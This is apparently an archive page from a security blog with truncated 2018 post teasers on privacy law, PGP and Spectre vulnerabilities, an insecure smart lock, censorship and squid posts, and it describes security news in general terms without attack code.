California Passes New Privacy Law

The California legislature unanimously passed the strongest data privacy law in the nation. This is great news, but I have a lot of reservations. The Internet tech companies pressed to get this law passed out of self-defense. A ballot initiative was already going to be voted on in November, one...

Traffic Analysis of the LTE Mobile Standard

Interesting research in using traffic analysis to learn things about encrypted traffic. It's hard to know how critical these vulnerabilities are. They're very hard to close without wasting a huge amount of bandwidth. The active attacks are more interesting. EDITED TO ADD 7/3: More information. I...

Friday Squid Blogging: Fried Squid with Turmeric

Good-looking recipe. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...

Conservation of Threat

Here's some interesting research about how we perceive threats. Basically, as the environment becomes safer we basically manufacture new threats. From an essay about the research: To study how concepts change when they become less common, we brought volunteers into our laboratory and gave them a...

Manipulative Social Media Practices

The Norwegian Consumer Council just published an excellent report on the deceptive practices tech companies use to trick people into giving up their privacy. From the executive summary: Facebook and Google have privacy intrusive defaults, where users who want the privacy friendly option have to g...

IEEE Statement on Strong Encryption vs. Backdoors

The IEEE came out in favor of strong encryption: IEEE supports the use of unfettered strong encryption to protect confidentiality and integrity of data and communications. We oppose efforts by governments to restrict the use of strong encryption and/or to mandate exceptional access mechanisms suc...

Bypassing Passcodes in iOS

Last week, a story was going around explaining how to brute-force an iOS password. Basically, the trick was to plug the phone into an external keyboard and trying every PIN at once: We reported Friday on Hickey's findings, which claimed to be able to send all combinations of a user's possible...

Secure Speculative Execution

We're starting to see research into designing speculative execution systems that avoid Spectre- and Meltdown-like security problems. Here's one. I don't know if this particular design secure. My guess is that we're going to see several iterations of design and attack before we settle on something...

Friday Squid Blogging: Capturing the Giant Squid on Video

In this 2013 TED talk, oceanographer Edith Widder explains how her team captured the giant squid on video. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...

The Effects of Iran's Telegram Ban

The Center for Human Rights in Iran has released a report outlining the effect's of that country's ban on Telegram, a secure messaging app used by about half of the country. The ban will disrupt the most important, uncensored platform for information and communication in Iran, one that is used...

Domain Name Stealing at Gunpoint

I missed this story when it came around last year: someone tried to steal a domain name at gunpoint. He was just sentenced to 20 years in jail...

Algeria Shut Down the Internet to Prevent Students from Cheating on Exams

Algeria shut the Internet down nationwide to prevent high-school students from cheating on their exams. The solution in New South Wales, Australia was to ban smartphones. EDITED TO ADD 6/22: Slashdot thread...

Perverse Vulnerability from Interaction between 2-Factor Authentication and iOS AutoFill

Apple is rolling out an iOS security usability feature called Security code AutoFill. The basic idea is that the OS scans incoming SMS messages for security codes and suggests them in AutoFill, so that people can use them without having to memorize or type them. Sounds like a really good idea, bu...

Are Free Societies at a Disadvantage in National Cybersecurity

Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post: It seeks to explain why the United States is struggling to deal with the "soft"...

Ridiculously Insecure Smart Lock

Tapplock sells an "unbreakable" Internet-connected lock that you can open with your fingerprint. It turns out that: 1. The lock broadcasts its Bluetooth MAC address in the clear, and you can calculate the unlock key from it. 2. Any Tapplock account an unlock every lock. 3. You can open the lock...

Friday Squid Blogging: Cephalopod Week on Science Friday

It's Cephalopod Week! "Three hearts, eight arms, can't lose." As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...

Thomas Dullien on Complexity and Security

For many years, I have said that complexity is the worst enemy of security. At CyCon earlier this month, Thomas Dullien gave an excellent talk on the subject with far more detail than I've ever provided. Video. Slides...

Russian Censorship of Telegram

Internet censors have a new strategy in their bid to block applications and websites: pressuring the large cloud providers that host them. These providers have concerns that are much broader than the targets of censorship efforts, so they have the choice of either standing up to the censors or...

New iPhone OS May Include Device-Unlocking Security

iOS 12, the next release of Apple's iPhone operating system, may include features to prevent someone from unlocking your phone without your permission: The feature essentially forces users to unlock the iPhone with the passcode when connecting it to a USB accessory everytime the phone has not bee...

Router Vulnerability and the VPNFilter Botnet

On May 25, the FBI asked us all to reboot our routers. The story behind this request is one of sophisticated malware and unsophisticated home-network security, and it's a harbinger of the sorts of pervasive threats ­ from nation-states, criminals and hackers ­ that we should expect in coming year...

Friday Squid Blogging: Extinct Relatives of Squid

Interesting fossils. Note that a poster is available. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...

New Data Privacy Regulations

When Marc Zuckerberg testified before both the House and the Senate last month, it became immediately obvious that few US lawmakers had any appetite to regulate the pervasive surveillance taking place on the Internet. Right now, the only way we can force these companies to take our privacy more...

An Example of Deterrence in Cyberspace

In 2016, the US was successfully deterred from attacking Russia in cyberspace because of fears of Russian capabilities against the US. I have two citations for this. The first is from the book Russian Roulette: The Inside Story of Putin's War on America and the Election of Donald Trump, by Michae...

The Habituation of Security Warnings

We all know that it happens: when we see a security warning too often -- and without effect -- we start tuning it out. A new paper uses fMRI, eye tracking, and field studies to prove it. EDITED TO ADD 6/6: This blog post summarizes the findings...

Regulating Bitcoin

Ross Anderson has a new paper on cryptocurrency exchanges. From his blog: Bitcoin Redux explains what's going wrong in the world of cryptocurrencies. The bitcoin exchanges are developing into a shadow banking system, which do not give their customers actual bitcoin but rather display a "balance"...

E-Mail Vulnerabilities and Disclosure

Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client...

Friday Squid Blogging: Do Cephalopods Contain Alien DNA?

Maybe not DNA, but biological somethings. "Cause of Cambrian explosion -- Terrestrial or Cosmic?": Abstract: We review the salient evidence consistent with or predicted by the Hoyle-Wickramasinghe H-W thesis of Cometary Cosmic Biology. Much of this physical and biological evidence is...

Damaging Hard Drives with an Ultrasonic Attack

Playing a sound over the speakers can cause computers to crash and possibly even physically damage the hard drive. Academic paper...

1834: The First Cyberattack

Tom Standage has a great story of the first cyberattack against a telegraph network. The Blanc brothers traded government bonds at the exchange in the city of Bordeaux, where information about market movements took several days to arrive from Paris by mail coach. Accordingly, traders who could ge...

Numbers Stations

On numbers stations...

Kidnapping Fraud

Fake kidnapping fraud: "Most commonly we have unsolicited calls to potential victims in Australia, purporting to represent the people in authority in China and suggesting to intending victims here they have been involved in some sort of offence in China or elsewhere, for which they're being held...

Friday Squid Blogging: Squid Comic

It's not very good, but it has a squid in it. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...

Security and Human Behavior (SHB 2018)

I'm at Carnegie Mellon University, at the eleventh Workshop on Security and Human Behavior. SHB is a small invitational gathering of people studying various aspects of the human side of security, organized each year by Alessandro Acquisti, Ross Anderson, and myself. The 50 or so people in the roo...

Detecting Lies through Mouse Movements

Interesting research: "The detection of faked identity using unexpected questions and mouse dynamics," by Merulin Monaro, Luciano Gamberini, and Guiseppe Sartori. Abstract: The detection of faked identities is a major problem in security. Current memory-detection techniques cannot be used as they...

Font Steganography

Interesting research in steganography at the font level...

Supermarket Shoplifting

The rise of self-checkout has caused a corresponding rise in shoplifting...

Another Spectre-Like CPU Vulnerability

Google and Microsoft researchers have disclosed another Spectre-like CPU side-channel vulnerability, called "Speculative Store Bypass." Like the others, the fix will slow the CPU down. The German tech site Heise reports that more are coming. I'm not surprised. Writing about Spectre and Meltdown i...

Japan's Directorate for Signals Intelligence

The Intercept has a long article on Japan's equivalent of the NSA: the Directorate for Signals Intelligence. Interesting, but nothing really surprising. The directorate has a history that dates back to the 1950s; its role is to eavesdrop on communications. But its operations remain so highly...

Friday Squid Blogging: Flying Squid

Flying squid are real. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...

Maliciously Changing Someone's Address

Someone changed the address of UPS corporate headquarters to his own apartment in Chicago. The company discovered it three months later. The problem, of course, is that in the US there isn't any authentication of change-of-address submissions: According to the Postal Service, nearly 37 million...

White House Eliminates Cybersecurity Position

The White House has eliminated the cybersecurity coordinator position. This seems like a spectacularly bad idea...

Accessing Cell Phone Location Information

The New York Times is reporting about a company called Securus Technologies that gives police the ability to track cell phone locations without a warrant: The service can find the whereabouts of almost any cellphone in the country within seconds. It does this by going through a system typically...

Sending Inaudible Commands to Voice Assistants

Researchers have demonstrated the ability to send inaudible commands to voice assistants like Alexa, Siri, and Google Assistant. Over the last two years, researchers in China and the United States have begun demonstrating that they can send hidden commands that are undetectable to the human ear t...

Details on a New PGP Vulnerability

A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote...

Critical PGP Vulnerability

EFF is reporting that a critical vulnerability has been discovered in PGP and S/MIME. No details have been published yet, but one of the researchers wrote: We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of...

Friday Squid Blogging: How the Squid Lost Its Shell

Squids used to have shells. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered. Read my blog posting guidelines here...

Airline Ticket Fraud

New research: "Leaving on a jet plane: the trade in fraudulently obtained airline tickets:" Abstract: Every day, hundreds of people fly on airline tickets that have been obtained fraudulently. This crime script analysis provides an overview of the trade in these tickets, drawing on interviews wit...

Supply-Chain Security

Earlier this month, the Pentagon stopped selling phones made by the Chinese companies ZTE and Huawei on military bases because they might be used to spy on their users. It's a legitimate fear, and perhaps a prudent action. But it's just one instance of the much larger issue of securing our supply...

Virginia Beach Police Want Encrypted Radios

This article says that the Virginia Beach police are looking to buy encrypted radios. Virginia Beach police believe encryption will prevent criminals from listening to police communications. They said officer safety would increase and citizens would be better protected. Someone should ask them if...

The US Is Unprepared for Election-Related Hacking in 2018

This survey and report is not surprising: The survey of nearly forty Republican and Democratic campaign operatives, administered through November and December 2017, revealed that American political campaign staff -- primarily working at the state and congressional levels -- are not only unprepare...